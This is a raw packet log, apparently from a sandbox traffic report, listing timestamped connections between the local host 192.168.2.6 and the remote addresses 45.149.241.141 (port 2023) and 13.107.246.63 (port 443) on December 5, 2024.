                                                                                                              Dec 5, 2024 10:39:27.440372944 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.440517902 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.440722942 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.441509008 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.441629887 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.442576885 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.442754030 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.442799091 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.442873955 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.443725109 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.443865061 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.443965912 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.444859982 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.444955111 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.445202112 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.446100950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.446180105 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.446928024 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.447061062 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.447194099 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.447375059 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.448395967 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.448546886 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.448600054 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.449373007 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.521208048 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.533157110 CET4434991413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.534252882 CET49914443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.534271955 CET4434991413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.534710884 CET49914443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.534718037 CET4434991413.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.549310923 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.549850941 CET49915443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.549865961 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.550352097 CET49915443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.550359964 CET4434991513.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.560395002 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.560422897 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.560556889 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.560576916 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.560872078 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.560879946 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.560894966 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.561067104 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.561099052 CET4434990813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.561151028 CET49908443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.563908100 CET49918443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.563941002 CET4434991813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.564023972 CET49918443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.564304113 CET49918443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.564318895 CET4434991813.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.581674099 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.581768036 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.581831932 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.582005978 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.582051992 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.582101107 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.583173990 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.583276987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.584327936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.584408045 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.584435940 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.585517883 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.585580111 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.585585117 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.587580919 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.587596893 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.587658882 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.587658882 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.587732077 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.587750912 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.589437962 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.589453936 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.589504004 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.589560032 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.590023041 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.590150118 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.590198994 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.591170073 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.591278076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.591335058 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.592320919 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.592365980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.592433929 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.596229076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.596383095 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.596447945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.596462965 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.596496105 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.596507072 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.596520901 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.596528053 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.596581936 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.597028971 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.597209930 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.597254992 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.599107027 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.599267960 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.599426031 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.600234032 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.600249052 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.600311995 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.600753069 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.600934029 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.601584911 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.601958036 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.602144003 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.602207899 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.602615118 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.602713108 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.602758884 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.603811979 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.603892088 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.603946924 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.604932070 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.604958057 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.605010033 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.606029987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.606128931 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.606199980 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.607287884 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.607420921 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.607741117 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.608315945 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.608421087 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.608475924 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.609524012 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.609666109 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.609725952 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.610599041 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.610706091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.610774040 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.611809015 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.611890078 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.611968040 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.612948895 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.613008976 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.613262892 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.614094019 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.614167929 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.614219904 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.615461111 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.615483999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.615562916 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.616435051 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.616487980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.616589069 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.617494106 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.617552996 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.617638111 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.618685007 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.618755102 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.618849993 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.619766951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.619816065 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.619868040 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.621052980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.621563911 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.621639013 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.624517918 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.624532938 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.624608994 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.624676943 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.624691010 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.624742985 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.625344992 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.625489950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.625634909 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.626470089 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.626483917 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.626538992 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.627579927 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.627770901 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.627883911 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.628727913 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.628858089 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.628943920 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.630060911 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.630198956 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.630614042 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.630965948 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.631153107 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.631222963 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.632211924 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.632358074 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.632427931 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.633555889 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.633578062 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.633663893 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.634531975 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.634634018 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.634677887 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.634679079 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.634828091 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.635215044 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.635767937 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.635879040 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.635976076 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.636908054 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.637010098 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.637082100 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.638046980 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.638192892 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.638247967 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.639216900 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.639522076 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.640104055 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.640351057 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.640455008 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.640533924 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.641633987 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.692302942 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.692399979 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.692465067 CET49913443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.692786932 CET49913443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.692786932 CET49913443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.692809105 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.692816973 CET4434991313.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.695554018 CET49919443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.695600986 CET4434991913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.695672035 CET49919443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.695808887 CET49919443192.168.2.613.107.246.63
                                                                                                              Dec 5, 2024 10:39:27.695822001 CET4434991913.107.246.63192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.774813890 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.774828911 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.774877071 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.775496960 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.775552988 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.775700092 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.775715113 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.775785923 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.776809931 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.777074099 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.777162075 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.777988911 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.778099060 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.778155088 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.779167891 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.779181004 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.779267073 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.780288935 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.780400991 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.780488014 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.781464100 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.781589985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.781649113 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.782521009 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.782527924 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.782594919 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.783725023 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.783854961 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.783900976 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.784941912 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.784954071 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.785043955 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.785965919 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.786077023 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.786186934 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.787147999 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.787280083 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.788003922 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.788269997 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.788384914 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.788475990 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.789546013 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.789558887 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.789601088 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.790774107 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.790786028 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.790854931 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.791641951 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.791908026 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.792208910 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.792826891 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.793073893 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.793119907 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.793885946 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.794006109 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.794073105 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.795150042 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.795165062 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.795207977 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.796264887 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.796391010 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.796427011 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.797307968 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.797409058 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.797461987 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.798458099 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.798470974 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.798547029 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.798599005 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.798659086 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.798804045 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.799779892 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.799793959 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.799865007 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.800914049 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.800976038 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.801043987 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.802042007 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.802133083 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.802206993 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.803236008 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.803400993 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.803600073 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.804435968 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.804492950 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.805536985 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.805550098 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.805587053 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.805634022 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.806615114 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.806698084 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.806756973 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.807759047 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.807883978 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.807956934 CET499122023192.168.2.645.149.241.141
                                                                                                              Dec 5, 2024 10:39:27.808896065 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.808960915 CET20234991245.149.241.141192.168.2.6
                                                                                                              Dec 5, 2024 10:39:27.809014082 CET499122023192.168.2.645.149.241.141
